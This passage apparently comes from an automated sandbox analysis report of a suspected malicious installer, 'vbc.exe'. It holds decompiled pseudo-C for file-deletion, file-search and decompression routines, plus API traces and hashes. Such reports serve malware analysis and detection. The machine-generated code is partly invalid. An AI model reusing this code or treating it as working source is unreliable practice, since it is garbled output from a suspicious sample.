                          					E00405A85(0x4214a0, _t72);
                          					__eflags = _t68;
                          					if(_t68 == 0) {
                          						E004055BF(_t72);
                          					} else {
                          						lstrcatA(0x4214a0, "\*.*");
                          					}
                          					__eflags =  *_t72;
                          					if( *_t72 != 0) {
                          						L10:
                          						lstrcatA(_t72, 0x40900c);
                          						L11:
                          						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
                          						_t37 = FindFirstFileA(0x4214a0,  &_v332); // executed
                          						__eflags = _t37 - 0xffffffff;
                          						_a4 = _t37;
                          						if(_t37 == 0xffffffff) {
                          							L29:
                          							__eflags = _v8;
                          							if(_v8 != 0) {
                          								_t31 = _t70 - 1;
                          								 *_t31 =  *(_t70 - 1) & 0x00000000;
                          								__eflags =  *_t31;
                          							}
                          							goto L31;
                          						} else {
                          							goto L12;
                          						}
                          						do {
                          							L12:
                          							_t75 =  &(_v332.cFileName);
                          							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                          							__eflags =  *_t49;
                          							if( *_t49 != 0) {
                          								__eflags = _v332.cAlternateFileName;
                          								if(_v332.cAlternateFileName != 0) {
                          									_t75 =  &(_v332.cAlternateFileName);
                          								}
                          							}
                          							__eflags =  *_t75 - 0x2e;
                          							if( *_t75 != 0x2e) {
                          								L19:
                          								E00405A85(_t70, _t75);
                          								__eflags = _v332.dwFileAttributes & 0x00000010;
                          								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                          									E0040573D(_t72);
                          									_t52 = DeleteFileA(_t72);
                          									__eflags = _t52;
                          									if(_t52 != 0) {
                          										E00404E23(0xfffffff2, _t72);
                          									} else {
                          										__eflags = _a8 & 0x00000004;
                          										if((_a8 & 0x00000004) == 0) {
                          											 *0x423f28 =  *0x423f28 + 1;
                          										} else {
                          											E00404E23(0xfffffff1, _t72);
                          											_push(0);
                          											_push(_t72);
                          											E004057D3();
                          										}
                          									}
                          								} else {
                          									__eflags = (_a8 & 0x00000003) - 3;
                          									if(__eflags == 0) {
                          										E004053AA(_t70, __eflags, _t72, _a8);
                          									}
                          								}
                          								goto L27;
                          							}
                          							_t61 =  *((intOrPtr*)(_t75 + 1));
                          							__eflags = _t61;
                          							if(_t61 == 0) {
                          								goto L27;
                          							}
                          							__eflags = _t61 - 0x2e;
                          							if(_t61 != 0x2e) {
                          								goto L19;
                          							}
                          							__eflags =  *((char*)(_t75 + 2));
                          							if( *((char*)(_t75 + 2)) == 0) {
                          								goto L27;
                          							}
                          							goto L19;
                          							L27:
                          							_t55 = FindNextFileA(_a4,  &_v332); // executed
                          							__eflags = _t55;
                          						} while (_t55 != 0);
                          						_t37 = FindClose(_a4); // executed
                          						goto L29;
                          					}
                          					__eflags =  *0x4214a0 - 0x5c;
                          					if( *0x4214a0 != 0x5c) {
                          						goto L11;
                          					}
                          					goto L10;
                          				} else {
                          					__eflags = _t37;
                          					if(_t37 == 0) {
                          						L31:
                          						__eflags = _v8;
                          						if(_v8 == 0) {
                          							L39:
                          							return _t37;
                          						}
                          						__eflags = _v12;
                          						if(_v12 != 0) {
                          							_t37 = E00405D7C(_t72);
                          							__eflags = _t37;
                          							if(_t37 == 0) {
                          								goto L39;
                          							}
                          							E00405578(_t72);
                          							E0040573D(_t72);
                          							_t37 = RemoveDirectoryA(_t72); // executed
                          							__eflags = _t37;
                          							if(_t37 != 0) {
                          								return E00404E23(0xffffffe5, _t72);
                          							}
                          							__eflags = _a8 & 0x00000004;
                          							if((_a8 & 0x00000004) == 0) {
                          								goto L33;
                          							}
                          							E00404E23(0xfffffff1, _t72);
                          							_push(0);
                          							_push(_t72);
                          							return E004057D3();
                          						}
                          						L33:
                          						 *0x423f28 =  *0x423f28 + 1;
                          						return _t37;
                          					}
                          					__eflags = _a8 & 0x00000002;
                          					if((_a8 & 0x00000002) == 0) {
                          						goto L31;
                          					}
                          					goto L5;
                          				}
                          			}


















                          APIs
                          • DeleteFileA.KERNELBASE(?,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 004053C8
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,00000000,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 00405412
                          • lstrcatA.KERNEL32(?,0040900C,?,C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,00000000,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 00405433
                          • lstrlenA.KERNEL32(?,?,0040900C,?,C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,00000000,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 00405439
                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,?,?,0040900C,?,C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*,?,00000000,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 0040544A
                          • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 004054FC
                          • FindClose.KERNELBASE(?), ref: 0040550D
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\*.*$\*.*
                          • API String ID: 2035342205-1934335244
                          • Opcode ID: 34c5472e85b81fd0ed43d064308d21e1862e95328fe31b5b9fae2b1a48a1451a
                          • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                          • Opcode Fuzzy Hash: 34c5472e85b81fd0ed43d064308d21e1862e95328fe31b5b9fae2b1a48a1451a
                          • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 585 405d7c-405d90 FindFirstFileA 586 405d92-405d9b FindClose 585->586 587 405d9d 585->587 588 405d9f-405da0 586->588 587->588
                          C-Code - Quality: 100%
                          			E00405D7C(CHAR* _a4) {
                          				void* _t2;
                          
                          				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                          				if(_t2 == 0xffffffff) {
                          					return 0;
                          				}
                          				FindClose(_t2);
                          				return 0x4224e8;
                          			}





                          APIs
                          • FindFirstFileA.KERNELBASE(?,004224E8,C:\,0040569C,C:\,C:\,00000000,C:\,C:\,?,?,74EC13E0,004053BE,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 00405D87
                          • FindClose.KERNEL32(00000000), ref: 00405D93
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: C:\$$B
                          • API String ID: 2295610775-645530273
                          • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                          • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                          • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                          • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 589 40604c-406051 590 4060c2-4060e0 589->590 591 406053-406082 589->591 594 4066b8-4066cd 590->594 592 406084-406087 591->592 593 406089-40608d 591->593 595 406099-40609c 592->595 596 406095 593->596 597 40608f-406093 593->597 598 4066e7-4066fd 594->598 599 4066cf-4066e5 594->599 600 4060ba-4060bd 595->600 601 40609e-4060a7 595->601 596->595 597->595 602 406700-406707 598->602 599->602 605 40628f-4062ad 600->605 603 4060a9 601->603 604 4060ac-4060b8 601->604 606 406709-40670d 602->606 607 40672e-40673a 602->607 603->604 610 406122-406150 604->610 608 4062c5-4062d7 605->608 609 4062af-4062c3 605->609 611 406713-40672b 606->611 612 4068bc-4068c6 606->612 616 405ed0-405ed9 607->616 614 4062da-4062e4 608->614 609->614 617 406152-40616a 610->617 618 40616c-406186 610->618 611->607 615 4068d2-4068e5 612->615 621 4062e6 614->621 622 406287-40628d 614->622 620 4068ea-4068ee 615->620 623 4068e7 616->623 624 405edf 616->624 619 406189-406193 617->619 618->619 626 406199 619->626 627 40610a-406110 619->627 643 40626c-406284 621->643 644 40686e-406878 621->644 622->605 625 40622b-406235 622->625 623->620 629 405ee6-405eea 624->629 630 406026-406047 624->630 631 405f8b-405f8f 624->631 632 405ffb-405fff 624->632 639 40687a-406884 625->639 640 40623b-406404 625->640 649 406856-406860 626->649 650 4060ef-406107 626->650 641 4061c3-4061c9 627->641 642 406116-40611c 627->642 629->615 636 405ef0-405efd 629->636 630->594 634 405f95-405fae 631->634 635 40683b-406845 631->635 637 406005-406019 632->637 638 40684a-406854 632->638 645 405fb1-405fb5 634->645 635->615 636->623 648 405f03-405f49 636->648 651 40601c-406024 637->651 638->615 639->615 640->616 646 406227 641->646 647 4061cb-4061e9 641->647 642->610 642->646 643->622 644->615 645->631 653 405fb7-405fbd 645->653 646->625 654 406201-406213 647->654 655 4061eb-4061ff 647->655 656 405f71-405f73 648->656 657 405f4b-405f4f 648->657 649->615 650->627 651->630 651->632 660 405fe7-405ff9 
653->660 661 405fbf-405fc6 653->661 662 406216-406220 654->662 655->662 658 405f81-405f89 656->658 659 405f75-405f7f 656->659 663 405f51-405f54 GlobalFree 657->663 664 405f5a-405f68 GlobalAlloc 657->664 658->645 659->658 659->659 660->651 665 405fd1-405fe1 GlobalAlloc 661->665 666 405fc8-405fcb GlobalFree 661->666 662->641 667 406222 662->667 663->664 664->623 668 405f6e 664->668 665->623 665->660 666->665 670 406862-40686c 667->670 671 4061a8-4061c0 667->671 668->656 670->615 671->641
                          C-Code - Quality: 98%
                          			E0040604C() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				void* _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t590;
                          				signed int* _t607;
                          				void* _t614;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t614 - 0x40) != 0) {
                          						 *(_t614 - 0x34) = 1;
                          						 *(_t614 - 0x84) = 7;
                          						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                          						L132:
                          						 *(_t614 - 0x54) = _t607;
                          						L133:
                          						_t531 =  *_t607;
                          						_t590 = _t531 & 0x0000ffff;
                          						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                          						if( *(_t614 - 0xc) >= _t565) {
                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                          							 *(_t614 - 0x40) = 1;
                          							_t532 = _t531 - (_t531 >> 5);
                          							 *_t607 = _t532;
                          						} else {
                          							 *(_t614 - 0x10) = _t565;
                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                          							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                          						}
                          						if( *(_t614 - 0x10) >= 0x1000000) {
                          							L139:
                          							_t533 =  *(_t614 - 0x84);
                          							L140:
                          							 *(_t614 - 0x88) = _t533;
                          							goto L1;
                          						} else {
                          							L137:
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 5;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                          							goto L139;
                          						}
                          					} else {
                          						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          						__esi =  *(__ebp - 0x60);
                          						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          						__ecx =  *(__ebp - 0x3c);
                          						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          						__ecx =  *(__ebp - 4);
                          						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          						if( *(__ebp - 0x38) >= 4) {
                          							if( *(__ebp - 0x38) >= 0xa) {
                          								_t97 = __ebp - 0x38;
                          								 *_t97 =  *(__ebp - 0x38) - 6;
                          							} else {
                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          							}
                          						} else {
                          							 *(__ebp - 0x38) = 0;
                          						}
                          						if( *(__ebp - 0x34) == __edx) {
                          							__ebx = 0;
                          							__ebx = 1;
                          							L60:
                          							__eax =  *(__ebp - 0x58);
                          							__edx = __ebx + __ebx;
                          							__ecx =  *(__ebp - 0x10);
                          							__esi = __edx + __eax;
                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								_t216 = __edx + 1; // 0x1
                          								__ebx = _t216;
                          								__cx = __ax >> 5;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								L59:
                          								if(__ebx >= 0x100) {
                          									goto L54;
                          								}
                          								goto L60;
                          							} else {
                          								L57:
                          								if( *(__ebp - 0x6c) == 0) {
                          									 *(__ebp - 0x88) = 0xf;
                          									goto L170;
                          								}
                          								__ecx =  *(__ebp - 0x70);
                          								__eax =  *(__ebp - 0xc);
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								_t202 = __ebp - 0x70;
                          								 *_t202 =  *(__ebp - 0x70) + 1;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								goto L59;
                          							}
                          						} else {
                          							__eax =  *(__ebp - 0x14);
                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          							if(__eax >=  *(__ebp - 0x74)) {
                          								__eax = __eax +  *(__ebp - 0x74);
                          							}
                          							__ecx =  *(__ebp - 8);
                          							__ebx = 0;
                          							__ebx = 1;
                          							__al =  *((intOrPtr*)(__eax + __ecx));
                          							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          							L40:
                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          							 *(__ebp - 0x48) = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								 *(__ebp - 0x40) = 1;
                          								__cx = __ax >> 5;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								L38:
                          								__eax =  *(__ebp - 0x40);
                          								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          									while(1) {
                          										if(__ebx >= 0x100) {
                          											break;
                          										}
                          										__eax =  *(__ebp - 0x58);
                          										__edx = __ebx + __ebx;
                          										__ecx =  *(__ebp - 0x10);
                          										__esi = __edx + __eax;
                          										__ecx =  *(__ebp - 0x10) >> 0xb;
                          										__ax =  *__esi;
                          										 *(__ebp - 0x54) = __esi;
                          										__edi = __ax & 0x0000ffff;
                          										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          										if( *(__ebp - 0xc) >= __ecx) {
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          											__cx = __ax;
                          											_t169 = __edx + 1; // 0x1
                          											__ebx = _t169;
                          											__cx = __ax >> 5;
                          											 *__esi = __ax;
                          										} else {
                          											 *(__ebp - 0x10) = __ecx;
                          											0x800 = 0x800 - __edi;
                          											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          											__ebx = __ebx + __ebx;
                          											 *__esi = __cx;
                          										}
                          										 *(__ebp - 0x44) = __ebx;
                          										if( *(__ebp - 0x10) < 0x1000000) {
                          											L45:
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t155 = __ebp - 0x70;
                          											 *_t155 =  *(__ebp - 0x70) + 1;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          										}
                          									}
                          									L53:
                          									_t172 = __ebp - 0x34;
                          									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                          									L54:
                          									__al =  *(__ebp - 0x44);
                          									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          									L55:
                          									if( *(__ebp - 0x64) == 0) {
                          										 *(__ebp - 0x88) = 0x1a;
                          										goto L170;
                          									}
                          									__ecx =  *(__ebp - 0x68);
                          									__al =  *(__ebp - 0x5c);
                          									__edx =  *(__ebp - 8);
                          									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          									 *( *(__ebp - 0x68)) = __al;
                          									__ecx =  *(__ebp - 0x14);
                          									 *(__ecx +  *(__ebp - 8)) = __al;
                          									__eax = __ecx + 1;
                          									__edx = 0;
                          									_t191 = __eax %  *(__ebp - 0x74);
                          									__eax = __eax /  *(__ebp - 0x74);
                          									__edx = _t191;
                          									L79:
                          									 *(__ebp - 0x14) = __edx;
                          									L80:
                          									 *(__ebp - 0x88) = 2;
                          									goto L1;
                          								}
                          								if(__ebx >= 0x100) {
                          									goto L53;
                          								}
                          								goto L40;
                          							} else {
                          								L36:
                          								if( *(__ebp - 0x6c) == 0) {
                          									 *(__ebp - 0x88) = 0xd;
                          									L170:
                          									_t568 = 0x22;
                          									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                          									_t535 = 0;
                          									L172:
                          									return _t535;
                          								}
                          								__ecx =  *(__ebp - 0x70);
                          								__eax =  *(__ebp - 0xc);
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								_t121 = __ebp - 0x70;
                          								 *_t121 =  *(__ebp - 0x70) + 1;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          								goto L38;
                          							}
                          						}
                          					}
                          					L1:
                          					_t534 =  *(_t614 - 0x88);
                          					if(_t534 > 0x1c) {
                          						L171:
                          						_t535 = _t534 | 0xffffffff;
                          						goto L172;
                          					}
                          					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          						case 0:
                          							if( *(_t614 - 0x6c) == 0) {
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							_t534 =  *( *(_t614 - 0x70));
                          							if(_t534 > 0xe1) {
                          								goto L171;
                          							}
                          							_t538 = _t534 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t570);
                          							_push(9);
                          							_pop(_t571);
                          							_t610 = _t538 / _t570;
                          							_t540 = _t538 % _t570 & 0x000000ff;
                          							asm("cdq");
                          							_t605 = _t540 % _t571 & 0x000000ff;
                          							 *(_t614 - 0x3c) = _t605;
                          							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                          							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                          							_t613 = (0x300 << _t605 + _t610) + 0x736;
                          							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                          								L10:
                          								if(_t613 == 0) {
                          									L12:
                          									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                          									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                          									goto L15;
                          								} else {
                          									goto L11;
                          								}
                          								do {
                          									L11:
                          									_t613 = _t613 - 1;
                          									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                          								} while (_t613 != 0);
                          								goto L12;
                          							}
                          							if( *(_t614 - 4) != 0) {
                          								GlobalFree( *(_t614 - 4));
                          							}
                          							_t534 = GlobalAlloc(0x40, 0x600); // executed
                          							 *(_t614 - 4) = _t534;
                          							if(_t534 == 0) {
                          								goto L171;
                          							} else {
                          								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                          								goto L10;
                          							}
                          						case 1:
                          							L13:
                          							__eflags =  *(_t614 - 0x6c);
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 1;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                          							_t45 = _t614 - 0x48;
                          							 *_t45 =  *(_t614 - 0x48) + 1;
                          							__eflags =  *_t45;
                          							L15:
                          							if( *(_t614 - 0x48) < 4) {
                          								goto L13;
                          							}
                          							_t546 =  *(_t614 - 0x40);
                          							if(_t546 ==  *(_t614 - 0x74)) {
                          								L20:
                          								 *(_t614 - 0x48) = 5;
                          								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                          								goto L23;
                          							}
                          							 *(_t614 - 0x74) = _t546;
                          							if( *(_t614 - 8) != 0) {
                          								GlobalFree( *(_t614 - 8));
                          							}
                          							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                          							 *(_t614 - 8) = _t534;
                          							if(_t534 == 0) {
                          								goto L171;
                          							} else {
                          								goto L20;
                          							}
                          						case 2:
                          							L24:
                          							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                          							 *(_t614 - 0x84) = 6;
                          							 *(_t614 - 0x4c) = _t553;
                          							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                          							goto L132;
                          						case 3:
                          							L21:
                          							__eflags =  *(_t614 - 0x6c);
                          							if( *(_t614 - 0x6c) == 0) {
                          								 *(_t614 - 0x88) = 3;
                          								goto L170;
                          							}
                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                          							_t67 = _t614 - 0x70;
                          							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                          							__eflags =  *_t67;
                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                          							L23:
                          							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                          							if( *(_t614 - 0x48) != 0) {
                          								goto L21;
                          							}
                          							goto L24;
                          						case 4:
                          							goto L133;
                          						case 5:
                          							goto L137;
                          						case 6:
                          							goto L0;
                          						case 7:
                          							__eflags =  *(__ebp - 0x40) - 1;
                          							if( *(__ebp - 0x40) != 1) {
                          								__eax =  *(__ebp - 0x24);
                          								 *(__ebp - 0x80) = 0x16;
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x28);
                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          								__eax =  *(__ebp - 0x2c);
                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          								__eax = 0;
                          								__eflags =  *(__ebp - 0x38) - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          								__eax =  *(__ebp - 4);
                          								__eax =  *(__ebp - 4) + 0x664;
